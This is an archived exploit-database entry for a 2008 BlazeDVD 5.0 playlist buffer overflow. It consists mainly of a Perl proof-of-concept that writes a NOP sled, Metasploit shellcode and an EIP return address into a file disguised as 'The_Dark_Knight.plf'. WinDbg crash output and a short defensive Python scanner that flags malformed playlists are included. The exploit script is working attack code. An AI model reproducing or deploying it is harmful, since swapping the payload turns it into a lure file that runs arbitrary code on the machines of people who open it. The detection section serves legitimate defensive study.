
# Title : BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit
# Published : 2008-08-10
# Author : LiquidWorm


#!/usr/bin/perl
#
# Title: BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit (PoC)
#
# Summary: BlazeDVD is a leading, powerful and easy-to-use DVD player. It
# provides superior video and audio (Dolby) quality together with other
# enhanced features, e.g. DVD recording, image and DV playback, bookmarks
# and image capture. Besides DVD, Video CD and Audio CD, BlazeDVD supports
# DivX, MPEG4, RM, QuickTime, WMV, WMV-HD, Macromedia Flash and any other
# video file you have a codec installed for. The player is broadly
# compatible with hardware and runs stably under Windows 98, 98SE, Me,
# 2000, XP and Vista.
#
# Product web Page: http://www.blazevideo.com/dvd-player/index.htm
#
# Desc: BlazeDVD 5.0 suffers from a buffer overflow vulnerability that can be
# exploited locally and remotely via a crafted PLF playlist file. It fails to
# perform bounds checking on the input file, allowing EIP to be overwritten
# and thus control of the next instruction executed by the software. After
# successful exploitation, calc.exe is executed. Failed attempts result in a
# Denial of Service (DoS).
#
# WinDbg (output):
#
#  - (4d8.f80): Access violation - code c0000005 (first chance)
#  - First chance exceptions are reported before any exception handling.
#  - This exception may be expected and handled.
#  - eax=00000001 ebx=77f6c15c ecx=04bd0ba8 edx=00000042 esi=01beffc0 edi=6405565c
#  - eip=41414141 esp=0012f188 ebp=01befcf8 iopl=0         nv up ei pl nz ac pe nc
#  - cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010216
#  - 41414141 ??              ???
#
#
# Tested on Microsoft Windows XP SP2 (English)
#
# Vulnerability discovered by: Parvez Anwar and Greg Linares
#
# Refs:
#
# - http://secunia.com/advisories/23041/
# - http://www.frsirt.com/english/advisories/2006/4764
# - http://xforce.iss.net/xforce/xfdb/30567
# - http://osvdb.org/30770
# - http://www.securityfocus.com/bid/21337/
# - http://www.milw0rm.com/exploits/2880
#
# Exploit coded by Gjoko 'LiquidWorm' Krstic
#
# liquidworm@gmail.com
#
# http://www.zeroscience.org
#
# 08.08.2008
#

print "\n|==================================================================|\n";
print "|                                                                  |\n";
print "|    BlazeDVD 5.0 PLF Playlist File Remote Buffer Overflow Exploit |\n";
print "|              by LiquidWorm <liquidworm [at] gmail.com>           |\n";
print "|                                                                  |\n";
print "|==================================================================|\n\n";

$nop = "\x90" x 96;   # NOP sled preceding the payload


# win32_exec EXITFUNC=seh CMD=calc.exe Size=164 Encoder=PexFnstenvSub http://metasploit.com

$shellcode = "\x29\xc9\x83\xe9\xdd\xd9\xee".
	     "\xd9\x74\x24\xf4\x5b\x81\x73".
	     "\x13\x7d\xe6\xe7\x4e\x83\xeb".
	     "\xfc\xe2\xf4\x81\x0e\xa3\x4e".
	     "\x7d\xe6\x6c\x0b\x41\x6d\x9b".
	     "\x4b\x05\xe7\x08\xc5\x32\xfe".
	     "\x6c\x11\x5d\xe7\x0c\x07\xf6".
	     "\xd2\x6c\x4f\x93\xd7\x27\xd7".
	     "\xd1\x62\x27\x3a\x7a\x27\x2d".
	     "\x43\x7c\x24\x0c\xba\x46\xb2".
	     "\xc3\x4a\x08\x03\x6c\x11\x59".
	     "\xe7\x0c\x28\xf6\xea\xac\xc5".
	     "\x22\xfa\xe6\xa5\xf6\xfa\x6c".
	     "\x4f\x96\x6f\xbb\x6a\x79\x25".
	     "\xd6\x8e\x19\x6d\xa7\x7e\xf8".
	     "\x26\x9f\x42\xf6\xa6\xeb\xc5".
	     "\x0d\xfa\x4a\xc5\x15\xee\x0c".
	     "\x47\xf6\x66\x57\x4e\x7d\xe6".
	     "\x6c\x26\x41\xb9\xd6\xb8\x1d".
	     "\xb0\x6e\xb6\xfe\x26\x9c\x1e".
	     "\x15\x16\x6d\x4a\x22\x8e\x7f".
	     "\xb0\xf7\xe8\xb0\xb1\x9a\x85".
	     "\x86\x22\x1e\xc8\x82\x36\x18".
	     "\xe6\xe7\x4e";


$ret = "\x78\x53\xbe\x01";   # return address that overwrites EIP (little-endian)

$payload = $nop.$shellcode.$ret;

open(plf, ">./The_Dark_Knight.plf") or die "Cannot create playlist: $!";
binmode(plf);   # write the raw bytes unchanged (no CRLF translation on Windows)

print plf "$payload";

close(plf);

print "\n--> Playlist: The_Dark_Knight.plf successfully created...Enjoy!\n\n";

print "\n...t00t w00t!\n\a\n";


# August, 2008
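As an added defensive check (not part of the original PoC or of BlazeDVD), the script below inspects a PLF playlist before it reaches the player: the file is supposed to hold plain-text media paths, so an entry longer than Windows MAX_PATH, non-text bytes, or a long run of one byte (the filler that produces the EIP=41414141 crash shown above) marks it as suspicious. The thresholds and both sample playlists are constructed assumptions.

```python
import re

# Assumed thresholds (not from the advisory): PLF entries are file paths, so
# anything beyond Windows MAX_PATH (260) or outside printable text is abnormal.
MAX_ENTRY_LEN = 260
TEXT_BYTES = set(range(0x20, 0x7F)) | {0x09, 0x0D, 0x0A}


def scan_plf(data: bytes):
    """Return a list of (line_no, reason) findings for a PLF playlist body."""
    findings = []
    for line_no, raw in enumerate(data.split(b"\n"), start=1):
        entry = raw.rstrip(b"\r")
        if not entry:
            continue
        if len(entry) > MAX_ENTRY_LEN:
            findings.append((line_no, f"entry length {len(entry)} exceeds {MAX_ENTRY_LEN}"))
        bad = [b for b in entry if b not in TEXT_BYTES]
        if bad:
            findings.append((line_no, f"{len(bad)} non-text bytes (first 0x{bad[0]:02x})"))
        # 32+ identical consecutive bytes is filler/sled, never a real path
        if re.search(rb"(.)\1{31,}", entry, re.S):
            findings.append((line_no, "run of 32+ identical bytes (filler/NOP sled)"))
    return findings


def is_suspicious(data: bytes) -> bool:
    """True when any finding was raised for the playlist body."""
    return bool(scan_plf(data))


# Constructed samples: a benign two-entry playlist, and a malformed one with the
# layout of the PoC (96-byte sled, 164 opaque bytes, 4-byte address) but
# arbitrary filler instead of its shellcode.
BENIGN_PLF = b"C:\\Movies\\intro.mpg\r\nC:\\Movies\\feature.avi\r\n"
MALFORMED_PLF = b"\x90" * 96 + bytes(range(0x29, 0x29 + 164)) + b"\x78\x53\xbe\x01"

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN_PLF), ("malformed", MALFORMED_PLF)):
        print(name, scan_plf(sample) or "clean")
```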
